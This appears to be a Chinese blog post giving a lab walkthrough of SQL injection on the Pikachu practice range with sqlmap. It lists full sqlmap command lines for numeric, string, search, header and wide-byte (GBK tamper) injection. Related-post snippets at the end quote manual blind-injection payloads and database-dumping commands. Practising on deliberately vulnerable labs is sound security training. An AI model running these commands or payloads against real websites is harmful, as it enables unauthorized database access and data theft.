pikachu靶场-SQL注入(slqmap注入)

原创 于 2025-12-10 11:30:43 发布 · 265 阅读 · 9 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#sql #android #数据库

使用sqlmap探测,在 window系统中操作sqlmap

数字型

在这里插入图片描述
在这里插入图片描述

  1. 操作页面无特殊信息,选择后直接输出信息,无可用信息
  2. 抓包后得知,请求类型是POST类型,复制数据格式供后续使用
  3. 存在cookie,但考虑到无登录需求,这里就不需要cookie作为参数了
  4. 输入操作指令探测
python sqlmap.py -u "URL" --data "数据格式" --batch 

# 操作实例
python sqlmap.py -u "http://pikachu.cmd/vul/sqli/sqli_id.php" --data "id=1&submit=%E6%9F%A5%E8%AF%A2" --batch

在这里插入图片描述

  1. 得到结果,id字段存在SQL注入
  2. 注入类型包括(时间,布尔,报错,联合查询注入)这几类
  3. 闭合方式为数字型

字符型

在这里插入图片描述

  1. 网页无任何变化,只是换成了输入框
  2. 发现请求方式为GET类型
  3. 直接输入操作指令
python sqlmap.py -u "http://pikachu.cmd/vul/sqli/sqli_str.php?name=allen+&submit=%E6%9F%A5%E8%AF%A2" --batch

在这里插入图片描述

  1. name字段存在SQL注入
  2. 注入类型包括(布尔,把偶从,时间,联合注入)这几类
  3. 闭合方式为闭合

搜索型

在这里插入图片描述

  1. 网页输入无变化,无可用信息
  2. 请求方式为GET型
  3. 输入操作指令
# -v 指定输出详细的payload
python sqlmap.py -u "http://pikachu.cmd/vul/sqli/sqli_search.php?name=vince&submit=%E6%90%9C%E7%B4%A2" --batch -v 3

在这里插入图片描述

  1. name字段存在sql注入
  2. 注入类型(同上或图片中可以看到)
  3. 闭合方式为闭合

xx型

在这里插入图片描述

  1. GET请求
  2. 输入操作指令
python sqlmap.py -u "http://pikachu.cmd/vul/sqli/sqli_x.php?name=vince&submit=%E6%9F%A5%E8%AF%A2" --batch -v 3

在这里插入图片描述

  1. 可获得信息和上面的一样

http header

在这里插入图片描述

  1. 请求为post类型,
  2. 发现cookie的样式不一样且有特殊的内容,猜测注入点在cookie部分
  3. 具体注入点不确定,将抓到的包保存下来后续使用(记好存放位置)
  4. 输入操作指令
python sqlmap.py -r "文件路径" --level 3 --batch -v 3

python sqlmap.py -r "F:\SQLmap\file\pheader.txt" --level 3 --batch -v 3
#这里默认level是1级,无法探测出来,就指定级别为3级
# -r :指定数据包文件

在这里插入图片描述

布尔盲注和时间盲注页面无任何有用信息反馈,操作也是一样的

宽字节注入

在这里插入图片描述

  1. 页面请求类型为post

  2. 宽字节不是注入类型,而是绕过过滤的方式

  3. 尝试正常注入

    python sqlmap.py -u "http://pikachu.cmd/vul/sqli/sqli_widebyte.php" --data "name=kobe&submit=%E6%9F%A5%E8%AF%A2" -p name  --level=3 -v 3

在这里插入图片描述

  1. 发现无法探测出来,那就增加宽字节处理脚本(这里是sqlmap自带的)
python sqlmap.py -u "http://pikachu.cmd/vul/sqli/sqli_widebyte.php" --data "name=kobe&submit=%E6%9F%A5%E8%AF%A2" -p name --dbms=mysql --charset=GBK --tamper=unmagicquotes.py --level=3 -v 3
  1. –tamper:指定脚本,–dbs:探测的数据库类型,–charset:指定网站的编码方式

在这里插入图片描述

  1. 这里发现成功绕过,那就判断是宽字节绕过注入了
其它页面自己尝试有问题,后续在操作吧

pikachu --1

Sqlmappikachu的GET请求注入漏洞测试
weixin_62943062的博客
07-12 3610
Sqlmappikachu的GET请求注入漏洞测试
Pikachu漏洞练习平台实验——SQL注入
m0_73826804的博客
02-22 3805
SQL注入漏洞,主要是开发人员在构建代码时,没有对输入边界进行安全考虑,导致攻击者可以通过合法的输入点提交一些精心构造的语句,从而欺骗后台数据库对其进行执行,导致数据库信息泄漏的一种漏洞。比如我们期望用户输入整数的id,但是用户输入了上图中下面的语句,这是条能被正常执行的SQL语句,导致表中的数据都会输出。
通过SqlMappikachu平台进行注入
weixin_52347768的博客
11-24 2559
课上学习笔记
pikachu靶场SQL,sqlmap解法
m0_62584974的博客
07-31 4594
相信大家都熟悉了pikachu靶场的手工注入方法和原理,但是对于盲注等一些复杂的注入,自己一个个试十分麻烦,此时我们就可以使用sqlmap进行注入,所以我整理了一些pikachu靶场sqlmap解法,让新手更好地适应和熟练使用sqlmap这款十分好用的工具...............
使用Sqlmap进行sql注入(pikachu字符型注入为例)
weixin_48118301的博客
06-16 1045
sql注入
pikachu靶场-SQL-Inject
braty_的博客
02-23 1729
在owasp发布的top10排行榜里,注入漏洞一直是危害排名第一的漏洞,其中注入漏洞里面首当其冲的就是数据库注入漏洞。一个严重的SQL注入漏洞,可能会直接导致一家公司破产!SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。从而导致数据库受损(被脱裤、被删除、甚至整个服务器权限沦陷)。
pikachu靶机-sql注入
C-HOWE的博客
01-20 1708
本篇文章旨在为网络安全渗透测试靶机复现学习(内容学习中,仅供参考)。通过阅读本文,读者将能够对渗透pikachu靶场SQL注入模块有一定的了解。
Pikachu靶场-SQL注入-字符型注入(get)过关步骤
weixin_44257023的博客
07-16 1304
Pikachu靶场-SQL注入-字符型注入(get)过关步骤
pikachu靶场--SQL-Inject(数字型注入post)
2401_88387979的博客
12-02 339
没有输入位置,使用BP抓包。
pikachu靶场SQL注入
2201_75766364的博客
03-28 1502
程序员在编写web程序时,没有对客户端提交的参数进行严格的过滤和判断。用户可以修改参数或数据,并传递至服务器端,导致服务端拼接了伪造的SQL查询语句,服务端连接数据库,并将伪造的sql语句发送给数据库服务端执行,数据库sql语句的执行结 果,返回给了服务端,服务端又将结果返回给了客户端,从而获取到敏感信息,甚至执行危险的代码或 系统命令。简单来说就是:注入产生的原因是接受相关参数未经处理直接带入数据库查询操作。
别再傻傻的手工sql注入 --sqlmap 工具 带你当点鼠标的猴子
2301_81155391的博客
12-08 1169
-current-db 是为了简洁 只显示当前的数据库 就是如果是root 就会有许多的杂库 如information呀什么的 很烦 就这样写。--file-reader 就是文件的读取 当然也可以读取其他的配置文件 但是缺点就是读取的是编码的东西。风险:---risk (0-3) "" :指的是工具注入的这个风险的大小 意义和上边一样。就这样加密的我们的工具不知道这是加密的那还注入个毛啊 这个时候就需要使用我们的tamper。
皮卡丘(pikachu)SQL注入(手工和工具举例)
weixin_44787832的博客
07-21 4740
我们以数字型(使用sqlmap)和整数型(使用手工注入)举一个例子 数字型注入(POST) 我们使用了sqlmap 选择1点击查询并抓包 将抓下来的数据全部复制在一个记事本里,命名为1.txt 使用命令 python sqlmap.py –r 111.txt –current-db 爆出数据库pikachu 之后爆破表:python sqlmap.py –r 111.txt –D pikachu -tables 爆出表 在之后找一个表去爆列名 python
sqlmap注入参数(常用)pikachu靶场
wjwqp的专栏
03-02 1913
对于有SQL注入的参数,可以采用SQLMap进行批量测试,常用命令如下: 使用sqlmap跑post方式时的格式: python2 sqlmap.py -u "<url>" --data="<post提交的参数>" -<参数> 使用sqlmap数据库 pythonsqlmap.py -u "http://test.com/pikachu-m...
【网络安全-sql注入(5)】sqlmap以及几款自动化sql注入工具的详细使用过程(提供工具)
m0_67844671的博客
10-03 3899
本篇文章详细介绍了sqlmap工具和使用,如何用sqlmap进行自动化的SQL注入,还讲解了穿山甲,萝卜头等自动化SQL注入工具
Pikachu靶场——SQL注入漏洞
来日可期的博客
10-06 2862
SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。
pikachu靶场 字符型注入sqlmap注入参数,针对GET方法)
wjwqp的专栏
03-02 2769
pikachu靶场 字符型注入可以用BurpSuit进行操作,可以获取到所有用户,但是要获取数据库的表内容我们还是用SQLMAP进行。 SqlMap注入中,上次是采用POST表单的注入,这次我们讲解GET方法取表的内容。 参数返回:GET /pikachu/vul/sqli/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2 HTTP/1...
Pikachusqlmap注入实战---数字型注入
永不垂头的博客
08-06 1230
Pikachusqlmap注入实战—数字型注入 笔者这里以数字型注入为例进行详细展示: ①任意提交数据,使用bp抓包得到post方式提交的参数为 id=1&submit=%E6%9F%A5%E8%AF%A2 使用sqlmap跑post方式时的格式:python2 sqlmap.py -u “” --data="<post提交的参数>" -<参数> 使用sqlmap数据库 sqlmap.py -u “http://127.0.0.1/pikachu-master/vul/
pikachu SQL 注入(盲注)
weixin_60508121的博客
04-19 4405
SQL盲注 1.判断是否存在注入点 kobe' and 1=1# 正常返回结果 kobe' and 1=2# 返回空结果 2 2.猜测数据库长度(burp探测) kobe' and length(database())>=k # 数据库的长度为7 2. 猜测数据库名 kobe' and (select substr(database(),1,1))='k'# 得到数据库名为pikachu 3.盲注表名猜测 kobe' and length((sele..
关于PikachuSQL注入
最新发布
qq_65915499的博客
02-25 2142
name=1’+order+by+3–+ 报错。因为是搜索型注入根据语法‘%like%’输入1’后查看报错发现闭合应该是’通过admin和123456登录。尝试在user-agent注入。BP抓包尝试输入1’尝试注册利用报错注入。BP抓包尝试报错注入。使用sqlmap注入
Pikachu靶场-SQL注入寻找注入类型
01-01
### Pikachu靶场中的SQL注入类型教程 #### 数字型SQL注入 当应用程序未正确过滤用户输入且该输入被用于构建SQL查询的一部分时,可能会发生数字型SQL注入。如果参数是整数形式,则攻击者可以尝试通过改变这个数值来...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值